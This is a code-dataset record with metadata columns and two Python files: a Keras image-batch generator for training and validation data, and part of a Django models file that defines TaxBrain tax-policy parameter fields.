| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
82c4ded45ee65328011c8fc99a977e3023ed0234
| 3,307
|
py
|
Python
|
source/utils/data_generator.py
|
gujingxiao/IJCAI_Keras_Defense
|
e69b41c651e364e27c837f7c57efc6214b907373
|
[
"Apache-2.0"
] | 1
|
2019-10-11T15:31:25.000Z
|
2019-10-11T15:31:25.000Z
|
source/utils/data_generator.py
|
gujingxiao/IJCAI_Keras_Defense
|
e69b41c651e364e27c837f7c57efc6214b907373
|
[
"Apache-2.0"
] | null | null | null |
source/utils/data_generator.py
|
gujingxiao/IJCAI_Keras_Defense
|
e69b41c651e364e27c837f7c57efc6214b907373
|
[
"Apache-2.0"
] | null | null | null |
import os
import keras
import pandas as pd
import numpy as np
import cv2
from utils.preprocessing import data_augment
from utils.iaa_process import iaa_data_augment
# Train Generator
def train_generator(train_list, size, batchsize, augment, num_classes):
# Arrange all indexes
all_batches_index = np.arange(0, len(train_list))
out_images = []
out_masks = []
image_dir = np.array(train_list['image_dir'])
label_dir = np.array(train_list['label'])
while True:
# Random shuffle indexes every epoch
np.random.shuffle(all_batches_index)
for index in all_batches_index:
if os.path.exists(os.path.join('../', image_dir[index])):
image = cv2.resize(cv2.imread(os.path.join('../', image_dir[index])), (size, size))
if augment:
image_aug = iaa_data_augment(image)
label = int(label_dir[index])
image_aug = np.array(image_aug)
image_aug = image_aug / 255.
out_images.append(image_aug)
else:
image = np.array(image)
image = image / 255.
label = int(label_dir[index])
out_images.append(image)
out_masks.append(label)
if len(out_images) >= batchsize:
out_images = np.array(out_images)
out_masks = np.array(out_masks)
out_masks = keras.utils.to_categorical(out_masks, num_classes=num_classes)
yield out_images, out_masks
out_images, out_masks = [], []
else:
print(image_dir[index], 'does not exist.')
def valid_generator(val_list, size, batchsize, augment, num_classes):
# Arrange all indexes
all_batches_index = np.arange(0, len(val_list))
out_images = []
out_masks = []
image_dir = np.array(val_list['image_dir'])
label_dir = np.array(val_list['label'])
while True:
# Random shuffle indexes every epoch
np.random.shuffle(all_batches_index)
for index in all_batches_index:
if os.path.exists(os.path.join('../', image_dir[index])):
image = cv2.resize(cv2.imread(os.path.join('../', image_dir[index])), (size, size))
if augment:
image_aug = iaa_data_augment(image)
label = int(label_dir[index])
image_aug = np.array(image_aug)
image_aug = image_aug / 255.
out_images.append(image_aug)
else:
image = np.array(image)
image = image / 255.
label = int(label_dir[index])
out_images.append(image)
out_masks.append(label)
if len(out_images) >= batchsize:
out_images = np.array(out_images)
out_masks = np.array(out_masks)
out_masks = keras.utils.to_categorical(out_masks, num_classes=num_classes)
yield out_images, out_masks
out_images, out_masks = [], []
else:
print(image_dir[index], 'does not exist.')
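A hypothetical consumption sketch (added for illustration, not part of the file above): how these generators would typically feed a Keras model. The CSV files, their column layout, the image size, the class count, and the ResNet50 backbone are all assumptions.
import pandas as pd
from keras.applications.resnet50 import ResNet50

train_list = pd.read_csv('train.csv')   # assumed to contain 'image_dir' and 'label' columns
val_list = pd.read_csv('val.csv')

model = ResNet50(weights=None, classes=110)  # class count is an assumption
model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])

model.fit_generator(
    train_generator(train_list, size=224, batchsize=32, augment=True, num_classes=110),
    steps_per_epoch=len(train_list) // 32,
    validation_data=valid_generator(val_list, size=224, batchsize=32, augment=False, num_classes=110),
    validation_steps=len(val_list) // 32,
    epochs=10,
)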
| 41.860759
| 99
| 0.554279
| 390
| 3,307
| 4.448718
| 0.174359
| 0.082997
| 0.055331
| 0.078386
| 0.88415
| 0.874928
| 0.874928
| 0.843804
| 0.843804
| 0.802305
| 0
| 0.008804
| 0.347445
| 3,307
| 79
| 100
| 41.860759
| 0.795181
| 0.037799
| 0
| 0.782609
| 0
| 0
| 0.022033
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028986
| false
| 0
| 0.101449
| 0
| 0.130435
| 0.028986
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7d9a7c27387a68848932fd71df2d5cc504678da5
| 53,830
|
py
|
Python
|
webapp/apps/taxbrain/models.py
|
OpenSourcePolicyCenter/PolicyBrain
|
5edffcd5cf8bb6544afc1ed982636abe66e246e1
|
[
"MIT"
] | 13
|
2017-11-07T15:54:42.000Z
|
2018-09-27T20:56:28.000Z
|
webapp/apps/taxbrain/models.py
|
OpenSourcePolicyCenter/webapp-public
|
5edffcd5cf8bb6544afc1ed982636abe66e246e1
|
[
"MIT"
] | 547
|
2015-08-07T21:32:51.000Z
|
2017-09-14T21:25:43.000Z
|
webapp/apps/taxbrain/models.py
|
OpenSourcePolicyCenter/webapp-public
|
5edffcd5cf8bb6544afc1ed982636abe66e246e1
|
[
"MIT"
] | 23
|
2015-08-07T20:55:39.000Z
|
2017-08-25T19:20:20.000Z
|
import re
import uuid
import json
from distutils.version import LooseVersion
from django.db import models
from django.core import validators
from django.core.urlresolvers import reverse
from django.core.exceptions import ValidationError
from django.core.validators import MinValueValidator, MaxValueValidator, RegexValidator
from django.contrib.auth.models import User
from django.contrib.postgres.fields import JSONField, ArrayField
import datetime
from django.utils.timezone import make_aware
import taxcalc
from . import helpers
from . import param_formatters
from .behaviors import Resultable, Fieldable, DataSourceable, Hostnameable
# digit or true/false (case insensitive)
COMMASEP_REGEX = "(<,)|(\\d*\\.\\d+|\\d+)|((?i)(true|false))"
class CommaSeparatedField(models.CharField):
default_validators = [validators.RegexValidator(regex=COMMASEP_REGEX)]
description = "A comma separated field that allows multiple floats."
def __init__(self, verbose_name=None, name=None, **kwargs):
kwargs['max_length'] = kwargs.get('max_length', 200)
super(CommaSeparatedField, self).__init__(verbose_name, name, **kwargs)
def deconstruct(self):
name, path, args, kwargs = super(CommaSeparatedField, self).deconstruct()
if kwargs.get("max_length", None) == 1000:
del kwargs['max_length']
return name, path, args, kwargs
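# Illustrative note (added comment, not in the original file): a value stored in a
# CommaSeparatedField is a plain comma-separated string of numbers and/or booleans,
# e.g. '0.124,0.125,0.126' or 'True,False,True'; COMMASEP_REGEX above is the pattern
# the RegexValidator checks such values against.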
class SeparatedValuesField(models.TextField):
def __init__(self, *args, **kwargs):
self.token = kwargs.pop('token', ',')
super(SeparatedValuesField, self).__init__(*args, **kwargs)
def to_python(self, value):
if not value: return
if isinstance(value, list):
return value
return value.split(self.token)
def get_db_prep_value(self, value, connection=None, prepared=False):
if not value: return
assert(isinstance(value, list) or isinstance(value, tuple))
return self.token.join([str(s) for s in value])
def value_to_string(self, obj):
value = self._get_val_from_obj(obj)
return self.get_db_prep_value(value)
def from_db_value(self, value, expression, connection, context):
return self.to_python(value)
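# Hypothetical round-trip sketch (comments only, added for illustration):
#   f = SeparatedValuesField()
#   f.get_db_prep_value([2015, 2016, 2017])   # -> '2015,2016,2017'
#   f.to_python('2015,2016,2017')             # -> ['2015', '2016', '2017']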
class JSONReformTaxCalculator(models.Model):
'''
This class holds all of the text for a JSON-based reform input
for TaxBrain. A TaxSaveInputs model will have a foreign key to
an instance of this model if the user created the TaxBrain job
through the JSON input page.
'''
reform_text = models.TextField(blank=True, null=False)
raw_reform_text = models.TextField(blank=True, null=False)
assumption_text = models.TextField(blank=True, null=False)
raw_assumption_text = models.TextField(blank=True, null=False)
errors_warnings_text = models.TextField(blank=True, null=False)
def get_errors_warnings(self):
"""
Errors were only stored for the taxcalc.Policy class until PB 1.6.0
This method ensures that old runs are parsed correctly
"""
ew = json.loads(self.errors_warnings_text)
if 'errors' in ew:
return {'policy': ew}
else:
return ew
class ErrorMessageTaxCalculator(models.Model):
'''
This class holds all of the text for an error message on
TaxBrain. A TaxSaveInputs model will have a foreign key to
an instance of this model if the user created the TaxBrain job
that ends up failing and reporting this failure.
'''
text = models.CharField(blank=True, null=False, max_length=4000)
class TaxSaveInputs(DataSourceable, Fieldable, Resultable, Hostnameable,
models.Model):
"""
This model contains all the parameters for the tax model and the tax
result.
For filing status fields:
_0 = Single, _1 = Married filing Jointly, _2 = Married filing Separately,
_3 = Head of Household (example: _SS_thd50_0 is the Single filing
status for Income Threshold 1 in the Social Security Tax section.)
The exception to this rule is for EITC, where:
_0 = 0 Kids, _1 = 1 Kid, _2 = 2 Kids, & _3 = 3+ Kids
"""
# Parameters used for Social Security.
FICA_ss_trt = CommaSeparatedField(default=None, null=True, blank=True)
FICA_mc_trt = CommaSeparatedField(default=None, null=True, blank=True)
SS_Income_c = CommaSeparatedField(default=None, null=True, blank=True)
SS_Income_c_cpi = models.NullBooleanField(default=None, blank=True, null=True)
SS_thd50_0 = CommaSeparatedField(default=None, null=True, blank=True)
SS_thd50_1 = CommaSeparatedField(default=None, null=True, blank=True)
SS_thd50_2 = CommaSeparatedField(default=None, null=True, blank=True)
SS_thd50_3 = CommaSeparatedField(default=None, null=True, blank=True)
SS_thd50_4 = CommaSeparatedField(default=None, null=True, blank=True)
SS_thd50_cpi = models.NullBooleanField(default=None, blank=True, null=True)
SS_percentage1 = CommaSeparatedField(default=None, null=True, blank=True)
SS_thd85_0 = CommaSeparatedField(default=None, null=True, blank=True)
SS_thd85_1 = CommaSeparatedField(default=None, null=True, blank=True)
SS_thd85_2 = CommaSeparatedField(default=None, null=True, blank=True)
SS_thd85_3 = CommaSeparatedField(default=None, null=True, blank=True)
SS_thd85_4 = CommaSeparatedField(default=None, null=True, blank=True)
SS_thd85_cpi = models.NullBooleanField(default=None, blank=True, null=True)
SS_percentage2 = CommaSeparatedField(default=None, null=True, blank=True)
SS_Earnings_c = CommaSeparatedField(default=None, null=True, blank=True)
SS_Earnings_c_cpi = models.NullBooleanField(default=None, blank=True, null=True)
# Parameter for Additional Medicare tax
AMEDT_rt = CommaSeparatedField(default=None, blank=True, null=True)
AMEDT_ec_0 = CommaSeparatedField(default=None, blank=True, null=True)
AMEDT_ec_1 = CommaSeparatedField(default=None, blank=True, null=True)
AMEDT_ec_2 = CommaSeparatedField(default=None, blank=True, null=True)
AMEDT_ec_3 = CommaSeparatedField(default=None, blank=True, null=True)
AMEDT_ec_4 = CommaSeparatedField(default=None, blank=True, null=True)
AMEDT_ec_cpi = models.NullBooleanField(default=None, blank=True, null=True)
# Parameters used for Adjustments.
ALD_StudentLoan_hc = CommaSeparatedField(default=None, blank=True, null=True)
ALD_SelfEmploymentTax_hc = CommaSeparatedField(default=None, blank=True, null=True)
ALD_SelfEmp_HealthIns_hc = CommaSeparatedField(default=None, blank=True, null=True)
ALD_KEOGH_SEP_hc = CommaSeparatedField(default=None, blank=True, null=True)
ALD_EarlyWithdraw_hc = CommaSeparatedField(default=None, blank=True, null=True)
ALD_Alimony_hc = CommaSeparatedField(default=None, blank=True, null=True)
ALD_Dependents_hc = CommaSeparatedField(default=None, blank=True, null=True)
ALD_Dependents_Child_c = CommaSeparatedField(default=None, blank=True, null=True)
ALD_Dependents_Child_c_cpi = models.NullBooleanField(default=None, blank=True, null=True)
ALD_Dependents_Elder_c = CommaSeparatedField(default=None, blank=True, null=True)
ALD_Dependents_Elder_c_cpi = models.NullBooleanField(default=None, blank=True, null=True)
ALD_Dependents_thd_0 = CommaSeparatedField(default=None, blank=True, null=True)
ALD_Dependents_thd_1 = CommaSeparatedField(default=None, blank=True, null=True)
ALD_Dependents_thd_2 = CommaSeparatedField(default=None, blank=True, null=True)
ALD_Dependents_thd_3 = CommaSeparatedField(default=None, blank=True, null=True)
ALD_Dependents_thd_4 = CommaSeparatedField(default=None, blank=True, null=True)
ALD_Dependents_thd_cpi = models.NullBooleanField(default=None, blank=True, null=True)
ALD_Investment_ec_rt = CommaSeparatedField(default=None, blank=True, null=True)
ALD_InvInc_ec_base_code_active = CommaSeparatedField(default=None, blank=True, null=True)
ALD_InvInc_ec_rt = CommaSeparatedField(default=None, blank=True, null=True)
ALD_EducatorExpenses_hc = CommaSeparatedField(default=None, blank=True, null=True)
ALD_HSADeduction_hc = CommaSeparatedField(default=None, blank=True, null=True)
ALD_IRAContributions_hc = CommaSeparatedField(default=None, blank=True, null=True)
ALD_DomesticProduction_hc = CommaSeparatedField(default=None, blank=True, null=True)
ALD_Tuition_hc = CommaSeparatedField(default=None, blank=True, null=True)
DependentCredit_Child_c = CommaSeparatedField(default=None, blank=True, null=True)
DependentCredit_Nonchild_c = CommaSeparatedField(default=None, blank=True, null=True)
FilerCredit_c_0 = CommaSeparatedField(default=None, blank=True, null=True)
FilerCredit_c_1 = CommaSeparatedField(default=None, blank=True, null=True)
FilerCredit_c_2 = CommaSeparatedField(default=None, blank=True, null=True)
FilerCredit_c_3 = CommaSeparatedField(default=None, blank=True, null=True)
FilerCredit_c_4 = CommaSeparatedField(default=None, blank=True, null=True)
FilerCredit_c_cpi = models.NullBooleanField(default=None, blank=True, null=True)
FEI_ec_c = CommaSeparatedField(default=None, blank=True, null=True)
FEI_ec_c_cpi = models.NullBooleanField(default=None, blank=True, null=True)
# Parameters used for Personal Exemptions.
II_em = CommaSeparatedField(default=None, blank=True, null=True)
II_em_cpi = models.NullBooleanField(default=None, blank=True, null=True)
II_prt = CommaSeparatedField(default=None, blank=True, null=True)
II_em_ps_0 = CommaSeparatedField(default=None, blank=True, null=True)
II_em_ps_1 = CommaSeparatedField(default=None, blank=True, null=True)
II_em_ps_2 = CommaSeparatedField(default=None, blank=True, null=True)
II_em_ps_3 = CommaSeparatedField(default=None, blank=True, null=True)
II_em_ps_cpi = models.NullBooleanField(default=None, blank=True, null=True)
# Parameters used for Standard Deductions.
STD_Dep = CommaSeparatedField(default=None, blank=True, null=True)
STD_0 = CommaSeparatedField(default=None, blank=True, null=True)
STD_1 = CommaSeparatedField(default=None, blank=True, null=True)
STD_2 = CommaSeparatedField(default=None, blank=True, null=True)
STD_3 = CommaSeparatedField(default=None, blank=True, null=True)
STD_4 = CommaSeparatedField(default=None, blank=True, null=True)
STD_cpi = models.NullBooleanField(default=None, blank=True, null=True)
# Parameters used for Personal Refundable Credit.
II_credit_0 = CommaSeparatedField(default=None, blank=True, null=True)
II_credit_1 = CommaSeparatedField(default=None, blank=True, null=True)
II_credit_2 = CommaSeparatedField(default=None, blank=True, null=True)
II_credit_3 = CommaSeparatedField(default=None, blank=True, null=True)
II_credit_4 = CommaSeparatedField(default=None, blank=True, null=True)
II_credit_cpi = models.NullBooleanField(default=None, blank=True, null=True)
II_credit_ps_0 = CommaSeparatedField(default=None, blank=True, null=True)
II_credit_ps_1 = CommaSeparatedField(default=None, blank=True, null=True)
II_credit_ps_2 = CommaSeparatedField(default=None, blank=True, null=True)
II_credit_ps_3 = CommaSeparatedField(default=None, blank=True, null=True)
II_credit_ps_cpi = models.NullBooleanField(default=None, blank=True, null=True)
II_credit_prt = CommaSeparatedField(default=None, blank=True, null=True)
# Parameters used for the additional standard deduction for the aged.
STD_Aged_0 = CommaSeparatedField(default=None, blank=True, null=True)
STD_Aged_1 = CommaSeparatedField(default=None, blank=True, null=True)
STD_Aged_2 = CommaSeparatedField(default=None, blank=True, null=True)
STD_Aged_3 = CommaSeparatedField(default=None, blank=True, null=True)
STD_Aged_4 = CommaSeparatedField(default=None, blank=True, null=True)
STD_Aged_cpi = models.NullBooleanField(default=None, blank=True, null=True)
# Parameters used for Itemized Deductions.
ID_Medical_frt = CommaSeparatedField(default=None, blank=True, null=True)
ID_Medical_frt_add4aged = CommaSeparatedField(default=None, blank=True, null=True)
ID_Medical_hc = CommaSeparatedField(default=None, blank=True, null=True)
ID_Medical_c_0 = CommaSeparatedField(default=None, blank=True, null=True)
ID_Medical_c_1 = CommaSeparatedField(default=None, blank=True, null=True)
ID_Medical_c_2 = CommaSeparatedField(default=None, blank=True, null=True)
ID_Medical_c_3 = CommaSeparatedField(default=None, blank=True, null=True)
ID_Medical_c_cpi = models.NullBooleanField(default=None, blank=True, null=True)
ID_InterestPaid_hc = CommaSeparatedField(default=None, blank=True, null=True)
ID_InterestPaid_c_0 = CommaSeparatedField(default=None, blank=True, null=True)
ID_InterestPaid_c_1 = CommaSeparatedField(default=None, blank=True, null=True)
ID_InterestPaid_c_2 = CommaSeparatedField(default=None, blank=True, null=True)
ID_InterestPaid_c_3 = CommaSeparatedField(default=None, blank=True, null=True)
ID_InterestPaid_c_cpi = models.NullBooleanField(default=None, blank=True, null=True)
ID_Casualty_frt = CommaSeparatedField(default=None, blank=True, null=True)
ID_Casualty_hc = CommaSeparatedField(default=None, blank=True, null=True)
ID_Casualty_c_0 = CommaSeparatedField(default=None, blank=True, null=True)
ID_Casualty_c_1 = CommaSeparatedField(default=None, blank=True, null=True)
ID_Casualty_c_2 = CommaSeparatedField(default=None, blank=True, null=True)
ID_Casualty_c_3 = CommaSeparatedField(default=None, blank=True, null=True)
ID_Casualty_c_cpi = models.NullBooleanField(default=None, blank=True, null=True)
ID_Miscellaneous_frt = CommaSeparatedField(default=None, blank=True, null=True)
ID_Miscellaneous_hc = CommaSeparatedField(default=None, blank=True, null=True)
ID_Miscellaneous_c_0 = CommaSeparatedField(default=None, blank=True, null=True)
ID_Miscellaneous_c_1 = CommaSeparatedField(default=None, blank=True, null=True)
ID_Miscellaneous_c_2 = CommaSeparatedField(default=None, blank=True, null=True)
ID_Miscellaneous_c_3 = CommaSeparatedField(default=None, blank=True, null=True)
ID_Miscellaneous_c_cpi = models.NullBooleanField(default=None, blank=True, null=True)
ID_Charity_crt_all = CommaSeparatedField(default=None, blank=True, null=True)
ID_Charity_crt_noncash = CommaSeparatedField(default=None, blank=True, null=True)
ID_Charity_c_0 = CommaSeparatedField(default=None, blank=True, null=True)
ID_Charity_c_1 = CommaSeparatedField(default=None, blank=True, null=True)
ID_Charity_c_2 = CommaSeparatedField(default=None, blank=True, null=True)
ID_Charity_c_3 = CommaSeparatedField(default=None, blank=True, null=True)
ID_Charity_c_cpi = models.NullBooleanField(default=None, blank=True, null=True)
ID_ps_0 = CommaSeparatedField(default=None, blank=True, null=True)
ID_ps_1 = CommaSeparatedField(default=None, blank=True, null=True)
ID_ps_2 = CommaSeparatedField(default=None, blank=True, null=True)
ID_ps_3 = CommaSeparatedField(default=None, blank=True, null=True)
ID_ps_4 = CommaSeparatedField(default=None, blank=True, null=True)
ID_ps_cpi = models.NullBooleanField(default=None, blank=True, null=True)
ID_prt = CommaSeparatedField(default=None, blank=True, null=True)
ID_crt = CommaSeparatedField(default=None, blank=True, null=True)
ID_StateLocalTax_hc = CommaSeparatedField(default=None, blank=True, null=True)
ID_StateLocalTax_c_0 = CommaSeparatedField(default=None, blank=True, null=True)
ID_StateLocalTax_c_1 = CommaSeparatedField(default=None, blank=True, null=True)
ID_StateLocalTax_c_2 = CommaSeparatedField(default=None, blank=True, null=True)
ID_StateLocalTax_c_3 = CommaSeparatedField(default=None, blank=True, null=True)
ID_StateLocalTax_c_cpi = models.NullBooleanField(default=None, blank=True, null=True)
ID_StateLocalTax_crt = CommaSeparatedField(default=None, blank=True, null=True)
ID_StateLocalTax_crt_cpi = models.NullBooleanField(default=None, blank=True, null=True)
ID_RealEstate_hc = CommaSeparatedField(default=None, blank=True, null=True)
ID_RealEstate_c_0 = CommaSeparatedField(default=None, blank=True, null=True)
ID_RealEstate_c_1 = CommaSeparatedField(default=None, blank=True, null=True)
ID_RealEstate_c_2 = CommaSeparatedField(default=None, blank=True, null=True)
ID_RealEstate_c_3 = CommaSeparatedField(default=None, blank=True, null=True)
ID_RealEstate_c_cpi = models.NullBooleanField(default=None, blank=True, null=True)
ID_RealEstate_crt = CommaSeparatedField(default=None, blank=True, null=True)
ID_RealEstate_crt_cpi = models.NullBooleanField(default=None, blank=True, null=True)
ID_Charity_frt = CommaSeparatedField(default=None, blank=True, null=True)
ID_Charity_hc = CommaSeparatedField(default=None, blank=True, null=True)
ID_BenefitSurtax_trt = CommaSeparatedField(default=None, blank=True, null=True)
ID_BenefitSurtax_crt = CommaSeparatedField(default=None, blank=True, null=True)
ID_BenefitSurtax_em_0 = CommaSeparatedField(default=None, blank=True, null=True)
ID_BenefitSurtax_em_1 = CommaSeparatedField(default=None, blank=True, null=True)
ID_BenefitSurtax_em_2 = CommaSeparatedField(default=None, blank=True, null=True)
ID_BenefitSurtax_em_3 = CommaSeparatedField(default=None, blank=True, null=True)
ID_BenefitSurtax_em_4 = CommaSeparatedField(default=None, blank=True, null=True)
ID_BenefitSurtax_Switch_0 = models.CharField(default="True", blank=True, null=True, max_length=50)
ID_BenefitSurtax_Switch_1 = models.CharField(default="True", blank=True, null=True, max_length=50)
ID_BenefitSurtax_Switch_2 = models.CharField(default="True", blank=True, null=True, max_length=50)
ID_BenefitSurtax_Switch_3 = models.CharField(default="True", blank=True, null=True, max_length=50)
ID_BenefitSurtax_Switch_4 = models.CharField(default="True", blank=True, null=True, max_length=50)
ID_BenefitSurtax_Switch_5 = models.CharField(default="True", blank=True, null=True, max_length=50)
ID_BenefitSurtax_Switch_6 = models.CharField(default="True", blank=True, null=True, max_length=50)
ID_BenefitCap_rt = CommaSeparatedField(default=None, blank=True, null=True)
ID_BenefitCap_Switch_0 = models.CharField(default="True", blank=True, null=True, max_length=50)
ID_BenefitCap_Switch_1 = models.CharField(default="True", blank=True, null=True, max_length=50)
ID_BenefitCap_Switch_2 = models.CharField(default="True", blank=True, null=True, max_length=50)
ID_BenefitCap_Switch_3 = models.CharField(default="True", blank=True, null=True, max_length=50)
ID_BenefitCap_Switch_4 = models.CharField(default="True", blank=True, null=True, max_length=50)
ID_BenefitCap_Switch_5 = models.CharField(default="True", blank=True, null=True, max_length=50)
ID_BenefitCap_Switch_6 = models.CharField(default="True", blank=True, null=True, max_length=50)
ID_c_0 = CommaSeparatedField(default=None, blank=True, null=True)
ID_c_1 = CommaSeparatedField(default=None, blank=True, null=True)
ID_c_2 = CommaSeparatedField(default=None, blank=True, null=True)
ID_c_3 = CommaSeparatedField(default=None, blank=True, null=True)
ID_c_4 = CommaSeparatedField(default=None, blank=True, null=True)
ID_c_cpi = models.NullBooleanField(default=None, blank=True, null=True)
ID_AmountCap_rt = CommaSeparatedField(default=None, blank=True, null=True)
ID_AmountCap_rt_cpi = models.NullBooleanField(default=None, blank=True, null=True)
ID_AmountCap_Switch_0 = models.CharField(default="True", blank=True, null=True, max_length=50)
ID_AmountCap_Switch_1 = models.CharField(default="True", blank=True, null=True, max_length=50)
ID_AmountCap_Switch_2 = models.CharField(default="True", blank=True, null=True, max_length=50)
ID_AmountCap_Switch_3 = models.CharField(default="True", blank=True, null=True, max_length=50)
ID_AmountCap_Switch_4 = models.CharField(default="True", blank=True, null=True, max_length=50)
ID_AmountCap_Switch_5 = models.CharField(default="True", blank=True, null=True, max_length=50)
ID_AmountCap_Switch_6 = models.CharField(default="True", blank=True, null=True, max_length=50)
ID_AllTaxes_c_0 = CommaSeparatedField(default=None, blank=True, null=True)
ID_AllTaxes_c_1 = CommaSeparatedField(default=None, blank=True, null=True)
ID_AllTaxes_c_2 = CommaSeparatedField(default=None, blank=True, null=True)
ID_AllTaxes_c_3 = CommaSeparatedField(default=None, blank=True, null=True)
ID_AllTaxes_c_4 = CommaSeparatedField(default=None, blank=True, null=True)
ID_AllTaxes_c_cpi = models.NullBooleanField(default=None, blank=True, null=True)
# Parameters used for Investment Tax Rates.
CG_rt1 = CommaSeparatedField(default=None, blank=True, null=True)
CG_brk1_0 = CommaSeparatedField(default=None, blank=True, null=True)
CG_brk1_1 = CommaSeparatedField(default=None, blank=True, null=True)
CG_brk1_2 = CommaSeparatedField(default=None, blank=True, null=True)
CG_brk1_3 = CommaSeparatedField(default=None, blank=True, null=True)
CG_brk1_4 = CommaSeparatedField(default=None, blank=True, null=True)
CG_brk1_cpi = models.NullBooleanField(default=None, blank=True, null=True)
CG_rt2 = CommaSeparatedField(default=None, blank=True, null=True)
CG_brk2_0 = CommaSeparatedField(default=None, blank=True, null=True)
CG_brk2_1 = CommaSeparatedField(default=None, blank=True, null=True)
CG_brk2_2 = CommaSeparatedField(default=None, blank=True, null=True)
CG_brk2_3 = CommaSeparatedField(default=None, blank=True, null=True)
CG_brk2_4 = CommaSeparatedField(default=None, blank=True, null=True)
CG_brk2_cpi = models.NullBooleanField(default=None, blank=True, null=True)
CG_rt3 = CommaSeparatedField(default=None, blank=True, null=True)
CG_brk3_0 = CommaSeparatedField(default=None, blank=True, null=True)
CG_brk3_1 = CommaSeparatedField(default=None, blank=True, null=True)
CG_brk3_2 = CommaSeparatedField(default=None, blank=True, null=True)
CG_brk3_3 = CommaSeparatedField(default=None, blank=True, null=True)
CG_brk3_4 = CommaSeparatedField(default=None, blank=True, null=True)
CG_brk3_cpi = models.NullBooleanField(default=None, blank=True, null=True)
CG_rt4 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_rt1 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk1_0 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk1_1 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk1_2 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk1_3 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk1_4 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk1_cpi = models.NullBooleanField(default=None, blank=True, null=True)
AMT_CG_rt2 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk2_0 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk2_1 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk2_2 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk2_3 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk2_4 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk2_cpi = models.NullBooleanField(default=None, blank=True, null=True)
AMT_CG_rt3 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk3_0 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk3_1 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk3_2 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk3_3 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk3_4 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk3_cpi = models.NullBooleanField(default=None, blank=True, null=True)
AMT_CG_rt4 = CommaSeparatedField(default=None, blank=True, null=True)
CG_nodiff = CommaSeparatedField(default=None, blank=True, null=True)
CG_ec = CommaSeparatedField(default=None, blank=True, null=True)
CG_reinvest_ec_rt = CommaSeparatedField(default=None, blank=True, null=True)
NIIT_rt = CommaSeparatedField(default=None, blank=True, null=True)
NIIT_thd_0 = CommaSeparatedField(default=None, blank=True, null=True)
NIIT_thd_1 = CommaSeparatedField(default=None, blank=True, null=True)
NIIT_thd_2 = CommaSeparatedField(default=None, blank=True, null=True)
NIIT_thd_3 = CommaSeparatedField(default=None, blank=True, null=True)
NIIT_thd_4 = CommaSeparatedField(default=None, blank=True, null=True)
NIIT_thd_cpi = models.NullBooleanField(default=None, blank=True, null=True)
# Parameters used for Personal Income Tax Rate
II_rt1 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk1_0 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk1_1 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk1_2 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk1_3 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk1_4 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk1_cpi = models.NullBooleanField(default=None, blank=True, null=True)
II_rt2 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk2_0 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk2_1 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk2_2 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk2_3 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk2_4 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk2_cpi = models.NullBooleanField(default=None, blank=True, null=True)
II_rt3 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk3_0 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk3_1 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk3_2 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk3_3 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk3_4 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk3_cpi = models.NullBooleanField(default=None, blank=True, null=True)
II_rt4 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk4_0 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk4_1 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk4_2 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk4_3 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk4_4 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk4_cpi = models.NullBooleanField(default=None, blank=True, null=True)
II_rt5 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk5_0 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk5_1 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk5_2 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk5_3 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk5_4 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk5_cpi = models.NullBooleanField(default=None, blank=True, null=True)
